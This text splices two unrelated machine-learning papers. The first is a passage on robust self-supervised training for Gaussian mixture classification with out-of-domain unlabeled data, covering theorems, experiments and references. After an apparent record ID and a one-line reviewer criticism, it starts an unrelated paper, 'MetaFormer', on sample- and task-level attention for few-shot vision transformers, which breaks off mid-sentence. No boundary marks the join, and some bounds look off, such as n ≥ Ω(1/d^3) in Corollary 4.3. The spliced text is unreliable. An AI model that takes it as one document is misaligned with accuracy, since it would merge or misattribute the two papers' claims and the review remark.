theoretical example in order to give explicit bounds. Similar to Schmitz et al. (2018); Carmon et al. (2019); Zhai et al. (2019); Alayrac et al. (2019), we fully focus the binary classification problem of a high-dimensional Gaussian mixture model with two components using linear classifiers. Mathematically speaking, for some $\sigma_0 > 0$ and $\mu_0 \in \mathbb{R}^d$, let $P_0$ be the feature-label joint distribution over $\mathbb{R}^d \times \{-1, 1\}$ as follows: $$P_0(y = 1) = \frac{1}{2}, \quad P_0(X | y) = N(y\mu_0, \sigma_0^2 I).$$ (7) Also, suppose a shifted version of $P_0$, denoted by $P_1$ with $P_{1,X} = (1/2)\sum_{u=-1,1}N(u\mu_1, \sigma_1^2 I)$, where $\|\mu_0 - \mu_1\| \leq O(\alpha)$ and $|\sigma_1 - \sigma_0| \leq O(\alpha)$. Given the two sample sets $S_0$ and $S_1$ in this configuration, the problem is to estimate the optimal linear classifier which achieves the minimum error rate. 3 PROPOSED METHOD: ROBUST SELF-SUPERVISED (RSS) TRAINING We propose a solution that combines two generally independent paradigms in machine learning: self-training (Grandvalet & Bengio, 2004; Amini & Gallinari, 2002), and distributionally robust learning in equation 4. The essence of self-training is to use the currently learned model in order to induce artificial labels on the unlabeled data. Thus, for an unlabeled sample $X'_j$ and any given model parameter $\theta \in \Theta$, one can temporarily consider a pseudo label given by $h_\theta(X'_j)$. In this regard, the proposed solution denoted by $\hat{\theta}_{\text{RSS}} = \hat{\theta}_{\text{RSS}}(S_0, S_1)$ can be defined as follows: **Definition 3.1 (Robust Self-Supervised (RSS) Training).** The essence of RSS training is to add a penalty term to the robust version of the original ERM formulation, which is solely evaluated from the out-of-domain unlabeled samples in $S_1$. Mathematically speaking, for a cost function $c$ and parameter $\gamma \geq 0$, let us define the robust loss $\phi_\gamma : \mathcal{X} \times \{\pm 1\} \times \Theta \rightarrow \mathbb{R}$ as $$\phi_\gamma(X, y; \theta) \triangleq \sup_{Z \in \mathcal{X}} \ell(Z, y; \theta) - \gamma c(Z, X).$$ (8) In this regard, for a given set of parameters $\gamma, \gamma', \lambda \in \mathbb{R}_{\geq 0}$, the proposed RSS estimator is defined as $$\hat{\theta}_{\text{RSS}} \triangleq \arg\min_{\theta \in \Theta} \left\{ \frac{1}{m} \sum_{i=1}^{m} \phi_\gamma(X_i, y_i; \theta) + \frac{\lambda}{n} \sum_{j=1}^{n} \phi_{\gamma'}(X'_j, h_\theta(X'_j); \theta) \right\}. $$ (9) The proposed RSS loss in equation 9 comprises of two main terms. The first term attempts to minimize the empirical robust risk over the labeled data in $S_0$, where an adversary can alter the distribution of samples within a Wasserstein radius characterized by $\gamma$. In the proceeding sections, we show that $\gamma$ can become asymptotically large (radius becomes infinitesimally small) as $m \rightarrow \infty$ which is similar to Gao (2022). In fact, a small (but non-zero) budget for the adversary can control the generalization. The second term works only on the unlabeled data which are artificially labeled by $h_\theta$. It can be shown that this term regulates the classifier by forcing it to avoid crowded areas. The sensitivity of such regularization is controlled by both $\lambda$ and also $\gamma'$. --- 1Having a Wasserstein distance of $\alpha$ between two high-dimensional Gaussian distributions implies that both mean vectors $\mu_0, \mu_1$ and variances $\sigma_0, \sigma_1$ are within a fraction of at most $O(\alpha)$ from each other. 3.1 MODEL OPTIMIZATION: ALGORITHM AND THEORETICAL GUARANTEES It can be shown that for a convex loss function $\ell$, convex cost function $c$, and sufficiently large $\gamma$ and $\gamma'$ (i.e., sufficiently small Wasserstein radii), the optimization problem of equation 9 is convex and can be solved up to an arbitrarily high precision in polynomial time. Moreover, if $\ell$ is not convex, e.g., $\mathcal{H}$ is the set of all neural networks, a simple Stochastic Gradient Descent (SGD) algorithm is still guaranteed to reach to at least a local minimum of equation 9. More specifically, equation 9 is a minimax optimization problem and consists of an inner maximization (formulated in equation 8) followed by an outer minimization. As long as the cost function $c$ is strictly convex and $\gamma$ or $\gamma'$ are chosen sufficiently large, the inner maximization problem of equation 8 becomes strictly concave (Najafi et al., 2019; Sinha et al., 2017). This interesting property holds regardless the convexity of $\ell$, which is of paramount importance since $\ell$ is not convex in most practical situations. On the other hand, cost function candidates for $c$ which are considered in this paper are $\|\cdot\|_2$ and $\|\cdot\|_1^2$, which are strictly convex. Hence, equation 8 can be optimally solved in polynomial time. The outer minimization problem of equation 9 is also differentiable as long as $\ell$ is sufficiently smooth (again, convexity is not needed). This means the gradient of equation 9 exists and can be efficiently computed using the Envelope Theorem. Explicit bounds on the maximum number of steps in a simple SGD algorithm (with a mini-batch size of 1) in order to reach to an $\varepsilon$-neighborhood of the global maximum of equation 8 and a local minimum of equation 9 are given by Sinha et al. (2017). Also, formulating the gradient of minimax loss functions such as equation 9 using the envelope theorem has been carried out, for example, in Najafi et al. (2019) and Sinha et al. (2017). We have also used the same gradient formulation for the numerical optimization of our model parameters in Section 5 where experimental results on real data using neural networks have been illustrated. In the next section, we derive theoretical guarantees for $\hat{\theta}^{\text{RSS}}$ and show that it leads to improved generalization bounds when $n$ is sufficiently large and $\alpha$ is controlled. 4 THEORETICAL GUARANTEES AND GENERALIZATION BOUNDS In this section, we discuss the theoretical aspects of using the RSS training method, specially for the classification of a two-component Gaussian mixture model using linear classifiers, i.e., $\mathcal{H} \triangleq \{\text{sign}((\theta, \cdot)) : \mathbb{R}^d \to \{\pm 1\} | \theta \in \mathbb{R}^d\}$. For the sake of simplicity in results, let us define the loss function $\ell$ as the zero-one loss: $$\ell(X, y; \theta) = 1(y(\theta, X) \geq 0).$$ (10) However, extension of the theoretical guarantees in this work to other types of loss functions is straightforward. The following theorem shows that the proposed RSS estimator in 9 can potentially improve the generalization bound in a robust learning scenario. **Theorem 4.1.** Consider the setup described in Section 2 for the sample generation process (GMM assumption), and the loss function defined in equation 10. Using RSS training with $m$ labeled and $n$ unlabeled samples in $S_0$ and $S_1$, respectively, and for any $\gamma, \delta > 0$, there exist $\lambda$ and $\gamma'$ which can be calculated solely based on input samples such that the following holds with probability at least $1 - \delta$: $$\mathbb{E}_{P_0}[\phi_\gamma(X, y; \hat{\theta}^{\text{RSS}})] \leq \min_{\theta \in \Theta} \mathbb{E}_{P_0}[\phi_\gamma(X, y; \theta)] + O\left(\gamma \sqrt{\frac{2d}{m} \left(\alpha(\|\mu_0\|_2^2 + \sigma_0^2) + \sqrt{\frac{2d}{2n + m}} + \sqrt{\frac{2 \log(1/\delta)}{2n + m}}\right)}\right).$$ (11) The proof, as well as how to calculate $\lambda$ and $\gamma'$ can be found in Appendix B. Theorem 4.1 presents a generalization bound for the proposed estimator when one considers the robust loss under an adversarial budget, which is characterized by $\gamma$. Larger values of $\gamma$ correspond to smaller Wasserstein radii for the distributional adversary of equation 3. The residual term in the r.h.s. of equation 11 converges to zero with a faster rate compared to that of equation 6 given $n$ is sufficiently large and $\alpha$ is sufficiently small. We derive explicit conditions regarding this event in Corollary 4.3. Before that, let us show that for fixed $m$, as one increases the number of unlabeled samples $n$, the non-robust excess risk of the RSS-trained classifier decreases as well: Theorem 4.2. Consider the setting described in Theorem 4.1. Then, the estimator $\hat{\theta}^{\text{RSS}}$ of equation (9) using respectively $m$ labeled and $n$ unlabeled samples, along with specific values of $\gamma$, $\gamma'$, and $\lambda$ which can be calculated solely from the input samples, satisfies the following non-robust generalization bound with probability at least $1 - \delta$: $$R\left(\hat{\theta}^{\text{RSS}}, P\right) - \min_{\theta \in \Theta} R(\theta, P) \leq O\left(\frac{e^{-\frac{1}{4}\mu_0^2}}{\sqrt{2\sigma_0}\sqrt{2\pi}} \left( \|\mu_1\|_2^2 + \sigma_1^2 \right)^{2d\alpha} m + \frac{4d}{m} \sqrt{\frac{2d + 2\log \frac{1}{\delta}}{2n + m}} \right)^{1/4} + \sqrt{\frac{2\log \frac{1}{\delta}}{m}}.$$ Again, the proof and the procedure for calculating $\gamma$, $\gamma'$, and $\lambda$ are discussed in Appendix B. Based on the previous results, the following corollary showcases a number of surprising non-asymptotic conditions under which our generalization bound becomes superior to conventional approaches. Corollary 4.3. Consider the setting described in Theorem 4.2. Then, $\hat{\theta}^{\text{RSS}}$ of equation (9) with $m$ labeled and $n$ unlabeled samples has an advantage over the traditional ERM, if: $$\alpha \leq O\left(\frac{d}{m}\right), \quad n \geq \Omega\left(\frac{m^2}{d}\right).$$ Also, the following conditions are sufficient to make the minimum required $m$ (for a given error bound) independent of the dimension $d$: $$\alpha \leq O\left(\frac{1}{d}\right), \quad n \geq \Omega\left(\frac{1}{d^3}\right).$$ Proof is given in Appendix. Finally, Theorem 4.2 also implies that if unlabeled samples are drawn from the same distribution as that of the labeled ones, i.e., $\alpha = 0$, then the excess risk of RSS-training satisfies the following inequality with probability at least $1 - \delta$: $$R\left(\hat{\theta}^{\text{RSS}}, P\right) - \min_{\theta \in \Theta} R(\theta, P) \leq O\left(\left(\frac{d^3 \log \frac{1}{\delta}}{m^2 (2n + m)}\right)^{1/8} + \sqrt{\frac{\log \frac{1}{\delta}}{m}}\right),$$ which again shows the previously-mentioned improvements when all samples are in-domain. The assumption of an isotropic GMM with two components has been already studied in the literature (see Section I). Next, we present a more general case of Theorem 4.2 where each Gaussian component can have a non-diagonal covariance matrix. Mathematically speaking, suppose that $P_0$ and $P_1$ are defined as follows: $$P_0(y = 1) = \frac{1}{2}, \quad P_0(X | y) = N(y\mu_0, \Sigma_0),$$ $$P_{1,X} = \frac{1}{2}N(\mu_1, \Sigma_1) + \frac{1}{2}N(-\mu_1, \Sigma_1),$$ where $\|\mu_1 - \mu_0\| \leq O(\alpha)$, $\|\Sigma_1 - \Sigma_0\|_2 \leq O(\alpha)$ and $\|\mu_1\|_2 \geq \beta \lambda_{\max}(\Sigma_1)$. Assume a set of $m$ labeled samples $S_0 \sim P_0^m$, and a set of $n$ unlabeled samples $S_1 \sim P_{1,X}^n$. Theorem 4.4 (Generalization Bound for General Gaussian Mixture Models). Consider the setting described in equation (16). Using algorithm in equation (9) with $m$ labeled and $n$ unlabeled samples, there exists a set of parameters $\gamma$, $\gamma'$, $\lambda$ for which the following holds with probability at least $1 - \delta$: $$R\left(\hat{\theta}^{\text{RSS}}, P\right) - \min_{\theta \in \Theta} R(\theta, P) \leq O\left(e^{\vartheta^2} \left(\sqrt{\frac{\|\mu_1\|_2^2 + \text{Tr}(\Sigma_1)}{m}} C \alpha + \sqrt{\frac{\log \frac{1}{\delta}}{2n + m}} \frac{d\kappa_1 \kappa'_1}{\Delta(\Sigma)} \right)^{1/2} + \sqrt{\frac{\log \frac{1}{\delta}}{m}}\right),$$ where $$\vartheta = \|\mu_1\Sigma_1^{-1}\mu_1 - \mu_0\Sigma_0^{-1}\mu_0\|, \quad C = \left(\frac{\|\mu_0\|^2 + \lambda_{\min}(\Sigma_1)\|\mu_0\|_2}{\lambda_{\min}^2(\Sigma_1)}\right),$$ $$\kappa_1 = \frac{\lambda_{\max}(\Sigma_1)}{\lambda_{\min}(\Sigma_1)}, \quad \kappa'_1 = \frac{\lambda_{\max}(\Sigma_1)}{\Delta(\Sigma_1)},$$ $$\Delta(\Sigma_1) = \min\{\lambda_i(\Sigma_1) - \lambda_j(\Sigma_1)\}, \quad \forall i, j : \lambda_i(\Sigma_1) \neq \lambda_j(\Sigma_1),$$ and $\lambda_i(\Sigma)$ is the $i$th eigenvalue of $\Sigma$. Table 1: Accuracy of the model trained on labeled datasets of sizes 10, 20, 40, and 10,000 with varying amounts of unlabeled data from the same distribution with $\alpha = 0$ (left), and different distribution with $\alpha = 0.5\|\mu_0\|_2$ (right). | Labeled size | Acc | Unlabeled size | Acc | Labeled size | Acc | Unlabeled size | Acc | |--------------|-----|----------------|-----|--------------|-----|----------------|-----| | 10 | 0.59| 10 | 0.63| 10 | 0.59| 10 | 0.61| | | | 100 | 0.66| | | 100 | 0.65| | | | 1,000 | 0.79| | | 1,000 | 0.78| | | | 10,000 | **0.82**| | | 10,000 | **0.81**| | 20 | 0.62| 20 | 0.64| 20 | 0.62| 20 | 0.65| | | | 200 | 0.69| | | 200 | 0.65| | | | 2,000 | 0.80| | | 2,000 | 0.79| | | | 10,000 | **0.82**| | | 10,000 | **0.80**| | 40 | 0.65| 40 | 0.65| 40 | 0.65| 40 | 0.65| | | | 400 | 0.71| | | 400 | 0.73| | | | 4,000 | 0.81| | | 4,000 | 0.78| | | | 10,000 | **0.82**| | | 10,000 | **0.80**| | 10,000 | **0.83**| - | - | 10,000 | **0.83**| - | - | Proof can be found in Appendix. One important difference to note between Theorem 4.4 and Theorem 4.2 is the choice of $\gamma'$, which controls the adversarial budget for unlabeled (and out-of-domain) part of the dataset. In the setting of Theorem 4.2, we prefer to choose $\gamma'$ as small as possible. However, in the setting of Theorem 4.4, we consider the eigenvectors and eigenvalues of $\Sigma_1$ and $\Sigma_0$, as well as the direction of $\mu_1$ and $\mu_0$ in order to find the optimal value for the adversarial budget. In fact, there are cases in which selecting a large $\gamma'$ (less freedom for the adversary) may actually be the optimal choice. 5 EXPERIMENTAL RESULTS The effectiveness of the proposed method has been assessed through experimenting on various datasets, including simulated data, and real-world datasets of histopathology images. Each experiment has been divided into two parts: i) cases in which both labeled and unlabeled data are sampled from the same distribution, and ii) the scenarios where the unlabeled data differs in distribution from the labeled ones. First, let us specify the datasets used in our experiments: 1. **Simulated data** consists of binary-labeled data points with a dimension of $d = 200$, generated according to the setting described in Section 2. 2. **NCT-CRC-HE-100K** consists of 100,000 histopathology images of colon tissue [Katherm et al., 2018]. The images have dimensions of $224 \times 224$ and were captured at 20x magnification. The dataset is labeled with 9 distinct classes. 3. **PatchCamelyon** is a widely used benchmark dataset for medical image analysis. It consists of a large collection of 327,680 color histopathology images from lymph node, each with dimensions $96 \times 96$. The dataset has binary labels for presence/absence of metastatic tissue. 5.1 Experiment of simulated data To evaluate the effectiveness of our method on simulated data, we first find the optimal classifier using only labeled samples. Then, we apply our method with a varying number of unlabeled samples. The results (see Table 1) show that our proposed method achieves accuracy improvements comparable to models trained only on labeled samples. Moreover, results indicate that our method is more effective when labeled and unlabeled data come from the same distribution. However, it still demonstrates significant improvement even when the unlabeled samples undergo a distribution shift. Table 2: Accuracy of the model trained on labeled data from NCT-CRC-HE-100K dataset with varying amounts of unlabeled data from the same distribution (left), as well as when unlabeled samples come from a different distribution (PatchCamelyon dataset)(right). | Labeled size | Acc | Unlabeled size | Acc | Labeled size | Acc | Unlabeled size | Acc | |--------------|-----|----------------|-----|--------------|-----|----------------|-----| | 48 | 0.65| 700 | 0.80| 25 | 0.78| 400 | 0.79| | | | 2,000 | **0.82** | | | 2,000 | **0.81** | | 240 | 0.77| 1,200 | 0.82| 50 | 0.82| 700 | 0.86| | | | 4,000 | **0.83** | | | 3,000 | **0.87** | | 1040 | 0.83| 10,000 | 0.89| 300 | 0.87| 2,000 | 0.89| | | | 20,000 | **0.91** | | | 8,000 | **0.90** | | 50,000 | **0.916** | - | - | 32,000 | **0.94** | - | - | 5.2 Experiment of Histopathology Data The processing pipeline over the real-world dataset of histopathology images is based on using a ResNet50 encoder pre-trained on ImageNet (Deng et al., 2009; He et al., 2016), which extracts and stores $1 \times 1024$ embeddings from input images. Such embeddings are then used to train a deep neural network with four layers of size 2048 and one output layer for the class id. Also, we have used a LeakyReLU activation function. Experimental results in this part are shown in Table 2. Under the “same distribution” setting, both labeled and unlabeled data have been taken from the NCT-CRC-HE-100K dataset. On the other hand, “different distributions” setting implies that labeled data comes from the NCT-CRC-HE-100K dataset (labels are either “Normal” or “Tumor”), while the PatchCamelyon dataset was used for the unlabeled data. As a result, the final labeling is binary. The experimental results demonstrate that increasing the number of unlabeled data leads to an improvement in accuracy for both the ‘same’ and ‘different’ distribution settings. 6 Conclusion In this study, we address the robust and non-robust classification challenges with a limited labeled dataset and a larger collection of unlabeled samples, assuming a slight perturbation in the distribution of unlabeled data. We present the first non-asymptotic tradeoff between labeled ($m$) and unlabeled ($n$) sample sizes when learning a two-component Gaussian mixture model. Our analysis reveals that when $n \geq \Omega(m^2/d)$, the generalization bound improves compared to using only labeled data, even when unlabeled data points are slightly out-of-domain. We derive sophisticated results for the generalization error in both robust and non-robust scenarios, employing a technique based on optimizing a robust loss and regularization to avoid crowded and dense areas. Our framework integrates tools from self-training, distributionally robust learning, and optimal transport. Experiments on synthetic and real-world datasets validate our theoretical findings, demonstrating improved classification accuracy, even for non-Gaussian cases, by incorporating out-of-domain unlabeled samples. Our methodology hinges on leveraging such data to enhance robust accuracy and adapting the uncertainty neighborhood radius based on labeled and unlabeled sample quantities to strike a balance between bias and variance in classification error. For future work, there’s room for improving and relaxing the conditions for the utility of unlabeled data. Exploring error lower-bounds and impossibility results presents another intriguing avenue. Additionally, relaxing the constraints on the level of distribution shift for out-of-domain samples could be a promising direction. REFERENCES Jean-Baptiste Alayrac, Jonathan Uesato, Po-Sen Huang, Alhussein Fawzi, Robert Stanforth, and Pushmeet Kohli. Are labels required for improving adversarial robustness? *Advances in Neural Information Processing Systems*, 32, 2019. Massih-Reza Amini and Patrick Gallinari. Semi-supervised logistic regression. In *ECAI*, volume 2, pp. 11, 2002. Hassan Ashtiani, Shai Ben-David, Nicholas Harvey, Christopher Liaw, Abbas Mehrabian, and Yaniv Plan. Nearly tight sample complexity bounds for learning mixtures of gaussians via sample compression schemes. *Advances in Neural Information Processing Systems*, 31, 2018. J. Linmans B. S. Veeling, J. Winkens, T. Cohen, and M. Welling. Rotation equivariant cnns for digital pathology, September 2018. Battista Biggio and Fabio Roli. Wild patterns: Ten years after the rise of adversarial machine learning. In *Proceedings of the 2018 ACM SIGSAC Conference on Computer and Communications Security*, pp. 2154–2156, 2018. Jose Blanchet and Yang Kang. Semi-supervised learning based on distributionally robust optimization. *Data Analysis and Applications 3: Computational, Classification, Financial, Statistical and Stochastic Methods*, 5:1–33, 2020. Jose Blanchet, Yang Kang, and Karthyek Murthy. Robust wasserstein profile inference and applications to machine learning. *Journal of Applied Probability*, 56(3):830–857, 2019. Nicholas Carlini and David Wagner. Towards evaluating the robustness of neural networks. In *2017 ieee symposium on security and privacy (sp)*, pp. 39–57. Ieee, 2017. Yair Carmon, Aditi Raghunathan, Ludwig Schmidt, John C Duchi, and Percy S Liang. Unlabeled data improves adversarial robustness. *Advances in neural information processing systems*, 32, 2019. Richard J. Chen and Rahul G. Krishnan. Self-supervised vision transformers learn visual concepts in histopathology. *CoRR*, abs/2203.00585, 2022. Jia Deng, Wei Dong, Richard Socher, Li-Jia Li, Kai Li, and Li Fei-Fei. Imagenet: A large-scale hierarchical image database. In *2009 IEEE conference on computer vision and pattern recognition*, pp. 248–255. Ieee, 2009. Zhun Deng, Linjun Zhang, Amirata Ghorbani, and James Zou. Improving adversarial robustness via unlabeled out-of-domain data. In *International Conference on Artificial Intelligence and Statistics*, pp. 2845–2853. PMLR, 2021. Charlie Frogner, Sebastian Claici, Edward Chien, and Justin Solomon. Incorporating unlabeled data into distributionally robust learning. *Journal of Machine Learning Research*, 22(56):1–46, 2021. Rui Gao. Finite-sample guarantees for wasserstein distributionally robust optimization: Breaking the curse of dimensionality. *Operations Research*, 2022. Ian J Goodfellow, Jonathon Shlens, and Christian Szegedy. Explaining and harnessing adversarial examples. *arXiv preprint arXiv:1412.6572*, 2014. Yves Grandvalet and Yoshua Bengio. Semi-supervised learning by entropy minimization. *Advances in neural information processing systems*, 17, 2004. Kaiming He, Xiangyu Zhang, Shaoqing Ren, and Jian Sun. Deep residual learning for image recognition. In *Proceedings of the IEEE conference on computer vision and pattern recognition*, pp. 770–778, 2016. Jakob Nikolas Katherm, Halama, Niels, Marx, and Alexander. 100,000 histological images of human colorectal cancer and healthy tissue, April 2018.
RpKA1wqgk0
The paper does not demonstrate any efficiency gains from the proposed attention design. This is unconvincing, as one of the primary motivations described in the introduction is to reduce the computational cost of attention in ViTs when adapting for Meta-learning.
MetaFormer with Holistic Attention Modelling Improves Few-Shot Classification Anonymous authors Paper under double-blind review Abstract Pre-trained vision transformers have revolutionized few-shot image classification, and it has been recently demonstrated that the previous common practice of meta-learning in synergy with these pre-trained transformers still holds significance and contributes to further advancing their performance. Unfortunately, the majority of working insights in meta-learning such as task conditioning are specifically tailored for convolutional neural networks, thus failing to translate effectively to vision transformers. This work sets out to bridge this gap via a coherent and lightweight framework called MetaFormer, which maintains compatibility with off-the-shelf pre-trained vision transformers. The proposed MetaFormer consists of two attention modules, i.e., the Sample-level Attention Module (SAM) and the Task-level Attention Module (TAM). SAM works in conjunction with the patch-level attention in Transformers to enforce consistency in the attended features across samples within a task, while TAM regularizes learning of the current task with an attended task in the pool. Empirical results on four few-shot learning benchmarks, i.e., miniImageNet, tieredImageNet, CIFAR-FS, and FC100, showcase that our approach achieves the new state-of-the-art at a very modest increase in computational overhead. Furthermore, our approach excels in cross-domain task generalization scenarios. 1 Introduction There has been a sustained focus on few-shot learning (Vinyals et al., 2016b; Snell et al., 2017) where only a few labeled samples (support) are given for predicting unlabelled samples (query), aiming to approach human-level intelligence that can rapidly grasp new concepts. Meta-learning (Thrun & Pratt, 2012) has been a de-facto approach in dealing with few-shot learning, via leveraging the knowledge learned from previous tasks (Finn et al., 2017; Raghu et al., 2019). Recently, pre-trained Vision Transformers (ViTs) have impressively rivaled traditional Convolutional Neural Networks (CNNs) across diverse vision tasks (Dosovitskiy et al., 2020; Liu et al., 2021; Zhu et al., 2020; Ranftl et al., 2021; Strudel et al., 2021). Their impact has extended to few-shot image classification as well (He et al., 2022b; Dong et al., 2022; Lin et al., 2023). More notably, recent research suggests that meta-learning can effectively synergize with these pre-trained transformers to further enhance their few-shot learning performance (Hiller et al., 2022; Hu et al., 2022). Despite the initial success by directly adapting ProtoMAML (Triantafillou et al., 2020) and ProtoNet (Snell et al., 2017) in Hiller et al. (2022); Hu et al. (2022), the potential of leveraging other essential meta-learning advancements such as conditional meta-learning (Yao et al., 2019; Garnelo et al., 2018) that accommodates a diverse range of tasks remains unexplored in the context of ViTs. The core idea behind conditional meta-learning is to learn the relationship between tasks through task embeddings (Yao et al., 2020; Zhou et al., 2021a; Jiang et al., 2022), so that the transferable knowledge shared among only closely related tasks improves generalization. Accurately modeling task relationships under ViTs, however, poses a non-trivial challenge due to the expensive computation costs involved. For instance, considering $n$ patches in an image and $NK$ support images in a $N$-way $K$-shot task, the holistic attention across a total of $NT$ tasks could have a time complexity of up to $\mathcal{O}((nNKNT)^2)$. Given the oftentimes huge $NT$ as the number of episodic tasks sampled, the straightforward holistic attention becomes prohibitively expensive. In this work, we are motivated to propose a novel ViT-backed framework dubbed MetaFormer, which plays the strength of self-attention tailored for meta-learning while avoiding substantial computation overhead. Specifically, we break down the holistic attention into two stages, i.e., intra-task and inter-task interactions. In the first stage, we propose the Sample-level Attention Module (SAM) to accurately and efficiently model sample relationship within a task. By separately applying spatial attention implemented by the original ViT modules and sample attention in multiple layers, SAM alleviates high computational complexity and captures coarse-to-grain sample relationship. We implement the sample attention by a sample-wise attention mask, which not only enhances the consistency in identifying task-specific discriminative features but also facilitates the extension to autoregressive inference that takes interactions between query samples into consideration. Secondly, we propose the Task-level Attention Module (TAM) to model inter-task interactions. TAM automatically learns a task-specific probe vector, which summarizes the discriminative patterns of a task. Based on the probe vector, TAM retrieves the most relevant semantic feature patterns from seen tasks to regularize learning of the current task. To combat against the huge number of historical tasks, TAM consolidates probe vectors of previous tasks into a dynamic knowledge pool for retrieval. By stacking the SAM and TAM with the original ViT modules to formulate holistic attention, MetaFormer fully exploits knowledge within and across tasks and thereby demonstrates significant performance gains on established few-shot learning benchmarks. The main contributions of our work are summarized as follows: • We propose MetaFormer, a ViT-backed meta-learning method that takes full advantage of transformer characteristics for few-shot image classification and remains compatible with state-of-the-art pre-trained ViT backbones. • We introduce an autoregressive few-shot image classification setting to leverage query relationships and show our method can be easily extended to this setting via the sample attention mask. • Extensive experiments demonstrate that our MetaFormer outperforms state-of-the-art meta-learning methods on four widely-used few-shot learning benchmarks, including miniImageNet (Vinyals et al., 2016b), tieredImageNet (Ren et al., 2018b), CIFAR-FS (Bertinetto et al., 2019), and FC100 (Oreshkin et al., 2018). Also, it achieves remarkable performance in eight cross-domain benchmarks (Oh et al., 2022) and multi-domain benchmarks (Triantafillou et al., 2020). 2 RELATED WORK Meta-Learning in Few-Shot Classification. Meta-learning serves as a fundamental framework for few-shot learning with the aim of transferring prior knowledge for quickly adapting to new unseen tasks. Most related to our work are metric-based and generation-based meta-learning methods. Metric-based methods (Vinyals et al., 2016b; Snell et al., 2017; Oreshkin et al., 2018; Lee et al., 2019; Chen et al., 2021a; Zhang et al., 2020a; Ma et al., 2021c; Simon et al., 2020) seek to embed samples into global universal feature representations and use some nearest neighbor algorithm to measure sample similarity in the embedding space to give predictions. However, fixed embedding is not very robust and sufficient to accommodate tasks with significant shifts due to cluttered backgrounds and intricate scenes. To adapt the feature embedding to new tasks, several approaches are proposed to perform task adaptation utilizing within-support (Rusu et al., 2018; Ye et al., 2020) and support-query (Xu et al., 2020; Hou et al., 2019; Doersch et al., 2020; Kang et al., 2021) sample relationship. Besides, parameter-generation methods directly generate task-conditioned parameters for task adaptation (Qiao et al., 2018; Ma et al., 2021b; Sun et al., 2021; Bertinetto et al., 2016; Gidaris & Komodakis, 2019; Munkhdalai et al., 2018; Cai et al., 2018), such as convolution kernel parameters (Ma et al., 2021b; Zhmoginov et al., 2022) and batch normalization parameters (Requeima et al., 2019; Bateni et al., 2020). However, many methods such as task conditioning are specially tailored for CNNs and thus fail to translate effectively to vision transformers. Our approach is dedicated to fully leveraging the attention characteristics of vision transformers for intra- and inter-task interactions. Inter-task knowledge sharing. Meta-learning objective is to organize and distill previous knowledge for future reuse when adapting to new unseen tasks. To handle tasks with different distributions, a handful of works built upon the gradient-based methods try to extract the underlying task structure for customizing initialization (Yao et al., 2019; 2020; Zhou et al., 2021a; Jiang et al., 2022). However, these algorithms rely on time-consuming clustering and the discriminative task representations are difficult to learn (Jiang et al., 2022). In this paper, we adopt the knowledge pool to learn structured meta-knowledge (i.e., key feature patterns), which is then tailored to the current task through attention-based aggregation. We show later this achieves a better trade-off between task-specific and task-agnostic knowledge sharing. Recent works (Wang et al., 2022a; Smith et al., 2023; Douillard et al., 2022; Wang et al., 2022b) propose the prompt pool and use inter-task attention for continual learning settings to prevent catastrophic forgetting, which is different from our meta-learning setting. **Vision Transformers in Few-Shot Learning.** Vision Transformers (Dosovitskiy et al., 2020; Liu et al., 2021; Tu et al., 2022) utilize the self-attention mechanism to encode long-range dependency in the data. There’s a growing inclination in recent works towards designing self-distillation pretraining to train few-shot Transformers (He et al., 2022b; Dong et al., 2022; Lin et al., 2023). For example, HcT (He et al., 2022b) utilize the DINO-based (Caron et al., 2021) teacher-student framework to distill the global class token and train three cascaded transformers with two pooling layers in between. To further supervise the patch tokens, SUN (Dong et al., 2022) adopts the patch-level pseudo labels generated by the teacher network and SMKD (Lin et al., 2023) introduces the patch reconstruction loss in Masked Image Modeling (MIM) (He et al., 2022a; Bao et al., 2022; Zhou et al., 2022a). These methods seek a generalizable feature embedding that is fixed for different tasks. However, previous meta-learning methods (Hu et al., 2022; Hiller et al., 2022) have shown that meta-learning is beneficial for transferring past knowledge for feature adaptation. FewTURE (Hiller et al., 2022) learns the support-aware patch importance mask in the inner loop to mitigate the supervision collapse issue. Yet they use this in the top classifier, giving the network no or less opportunity to refine the features to adapt to a new task with a large variance. Thus there is an opportunity to further develop the meta-learning framework specifically for playing the strength of vision transformer. Similarly, we also ground our proposed meta-learning method on pre-trained vision transformers but embed the sample relationship into ViT with hierarchical task attention to learn more discriminative features for each task. And thus our contribution is orthogonal to SKMD. We empirically show that MetaFormer can further improve the joint performance. ### 3 MetaFormer for Few-shot Classification We present our approach in this section. The overall architecture of our MetaFormer is illustrated in Figure 1. We start by briefly introducing the few-shot image classification setting and the self- attention of vision transformer in Section 3.1 and then elaborate on our proposed Sample-level Attention Module (SAM) and Task-level Attention Module (TAM) in Section 3.2 and Section 3.2, respectively. Finally, using SAM and TAM as the core building block, we present a new vision transformer with holistic attention for meta-learning in Section 3.4. 3.1 Preliminaries Problem formulation. Few-shot learning aims to learn a model that can adapt to recognize new classes with only a few labeled examples. We adopt the episodic training manner following previous works (Vinyals et al., 2016b; Hiller et al., 2022). In a classical $N$-way $K$-shot setting, each episode randomly selects $N$ classes to form the support set $C = \{(x^c_j, y^c_j)\}_{j=1}^{N \times K}$ containing $K$ samples in each class and the query set $T = \{(x^t_j, y^t_j)\}_{j=1}^{M}$ with $M$ samples. Predictions are independent for every query sample for the inductive protocol (Vinyals et al., 2016b). We also introduce the autoregressive setting from regression tasks (Nguyen & Grover, 2022; Bruinsma et al., 2023) to classification tasks, where we autoregressively predict query samples and allow interactions between subsequent query samples and those predicted earlier. Self-attention in Vision Transformers. Given a $N$-way $K$-shot task as input $X \in \mathbb{R}^{(NK+M) \times H \times W \times 3}$, ViTs (Dosovitskiy et al., 2020) first divide individual images into $n$ non-overlapping patches and then map them into $d$-dimension tokens through a linear projection layer. After that, a trainable class token is prepended as the final input token sequence $X \in \mathbb{R}^{(NK+M) \times L \times d}$ ($L = n + 1$), taken by several multi-head self-attention (MSA) layers and MLP layers for feature extraction. Consider a MSA layer with $H$ heads, and query, key, and value embeddings of the input $X$ are given as $Q = W^Q X$, $K = W^K X$, $V = W^V X$, respectively. The output of MSA is given as: $$\text{MSA}(Q, K, V) = \text{Concat}(h_1, \ldots, h_H) W^O$$ where $h_i = \sigma(A_i)V_i = \sigma\left(\frac{Q_i K_i^\top}{\sqrt{d_k}}\right)V_i$ (1) where $W^O$ is the output projection matrix; $d_k = d/H$ is the head dimension; $\sigma(\cdot)$ denotes the softmax activation function; $A_h \in \mathbb{R}^{L \times L}$ is the attention matrix measuring pairwise token affinity at different spatial locations. After MSA as equation 1, every token within the image is aware of the global spatial information and thus we term MSA as the spatial attention module. 3.2 Sample-Level Attention Module To facilitate sample correspondence learning for task adaptation, most existing methods usually incorporate extra 